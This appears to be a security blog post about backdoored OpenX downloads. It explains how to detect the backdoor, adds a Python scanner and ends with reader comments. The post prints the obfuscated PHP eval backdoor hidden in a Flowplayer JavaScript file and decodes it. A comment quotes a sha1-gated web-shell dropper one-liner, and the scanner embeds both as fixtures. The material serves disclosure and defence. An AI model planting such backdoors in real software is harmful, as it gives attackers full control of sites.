We received reports that OpenX.org was compromised and the OpenX download files had a backdoor injected in them. According to Heise (in German), the malicious files were modified around November/2012, and have been undetected since.
It means that if you have downloaded OpenX during the last 7 months, it likely contains a backdoor that could allow the attackers full access to your site. That’s how serious it is.
*The OpenX team have confirmed the breach and removed the bad files from their servers.
OpenX Backdoor
We didn’t get access to the infected package yet, but based on some public sources, the backdoor is hidden inside:
/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js
It can be found by searching for PHP tags inside .js files.
This is what the backdoor looks like:
this.each(function(){l=flashembed(this,k,j)}<?php /*if(e) {jQuery.tools=jQuery.tools||{version: {}};jQuery.tools.version.flashembed='1.0.2'; */$j='ex'./**/'plode'; /* if(this.className ...
If you look closely, you can see the PHP code mingled with the JavaScript code, which is meant to make it harder to detect.
After decoding it looks like this:
<?php $j='explode'; $_=$j(",",'strrev,str_rot13,vastPlayer'); eval ( $_[1]($_[0]( $_POST[$_[2]])) );
It takes the POST parameter “vastPlayer”, reverses it, applies ROT13 and passes the result to “eval”, which allows the attackers to execute any PHP code they send in that parameter.
Here is a simple command to find if your OpenX install has the backdoor:
$ grep -r --include "*.js" '<?php' DIRECTORYWHEREYOURSITEIS
Our team is still investigating the issue, and we will provide more details soon.
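As an added example (not Sucuri’s code, and not the grep command above), a small Python scanner that generalises that check: it flags PHP open tags in any non-PHP file, the eval-of-decoded-request-data shape of the decoded payload, and the sha1-gated file-dropper one-liner a commenter quotes below. The sample tree it scans is constructed inline and the hash in it is a placeholder; the regexes are assumptions about the samples on this page, so a hit is a lead for review, not proof.

```python
import os
import re
import tempfile
from pathlib import Path
# Indicators derived from this page's samples; a hit is a lead for review, not proof.
PHP_OPEN_TAG = re.compile(rb"<\?php\b", re.IGNORECASE)
EVAL_OF_REQUEST = re.compile(rb"eval\s*\(.*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I | re.S)
DECODER = re.compile(rb"strrev|str_rot13|base64_decode|gzinflate", re.I)
DROPPER = re.compile(rb"sha1\s*\(\s*\$_REQUEST\b.*?(?:file_put_contents|system|call_user_func)", re.I | re.S)

def classify(path, data):
    hits = []
    if path.suffix.lower() != ".php" and PHP_OPEN_TAG.search(data):
        hits.append("php-tag-in-non-php-file")       # the post's grep, generalised to any non-PHP file
    if EVAL_OF_REQUEST.search(data) and DECODER.search(data):
        hits.append("eval-of-decoded-request-data")  # shape of the decoded flowplayer payload
    if DROPPER.search(data):
        hits.append("sha1-gated-file-dropper")       # the one-liner quoted in the comments
    return hits

def scan_tree(root):
    """Walk an install and map relative paths to the indicators they trigger."""
    root, findings = Path(root), {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = Path(dirpath, name)
            hits = classify(p, p.read_bytes())
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample tree: the page's decoded backdoor in the flowplayer file, a dropper with a placeholder hash, two clean controls.
SAMPLES = {
    "plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js":
        "this.each(function(){l=flashembed(this,k,j)}<?php $j='explode'; "
        "$_=$j(\",\",'strrev,str_rot13,vastPlayer'); eval($_[1]($_[0]($_POST[$_[2]])));",
    "www/images/layerstyles/geocities/geocities.php":
        "<?php if (sha1($_REQUEST[z]) == 'PLACEHOLDER_HASH'){@file_put_contents("
        "stripslashes($_REQUEST[e]),stripslashes($_REQUEST[t]));die(md5('md5'));}",
    "lib/clean.js": "function add(a,b){return a+b;}",
    "index.php": "<?php echo 'hello';",
}

def demo():
    # Write the samples to a temporary directory, scan it and return the findings.
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            f = Path(tmp, rel)
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_text(body)
        return scan_tree(tmp)
```

Point scan_tree() at a real install's document root to get the same mapping; the two clean control files produce no entry.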
9 comments
The attacker then puts lots of files with code like this:
<?php if (sha1($_REQUEST[z]) == '[REDACTED]'){@file_put_contents(stripslashes($_REQUEST[e]),stripslashes($_REQUEST[t]));die(md5('md5'));}
on the server (often replacing “file_put_contents” with “system” or “call_user_func” etc.), plus a couple of more complex backdoors containing obfuscated PHP code.
The best way to check an installation is to run a diff against a clean download of the same version.
Files found that are not present in the default installation and contain obfuscated code:
plugins/api/api.php
var/cache/minify_8faf80e_mergedDeliveryFunctions.php
www/admin/plugins/oxMarket/market-settings.php
www/images/layerstyles/geocities/geocities.php
Is there a way of fixing this?
OpenX.org has a fixed version, 2.8.11, out.
OpenX has version 2.8.11 out which fixes the problem. See their website.
Also, when compromised, look in the “banners” table of your OpenX database for cases where
prepend != ''
or more precisely
prepend LIKE '%iframe%'
This will typically show JavaScript code trying to exploit client vulnerabilities. The attacker seems to overwrite all contents of all “prepend” fields with the same JS code.
Is that a form of the virus? How would its effects
Read my postings below.
Main focus seemed to be to deliver malware with the ads delivered, though attacker might use his own backdoors for further malicious activities later if system isn’t patched.
No, no solution until now. Today, 24/09/2013, the version is OpenX 2.8.11, and this problem is still there.
It’s a shame; does the “paid” version have this problem?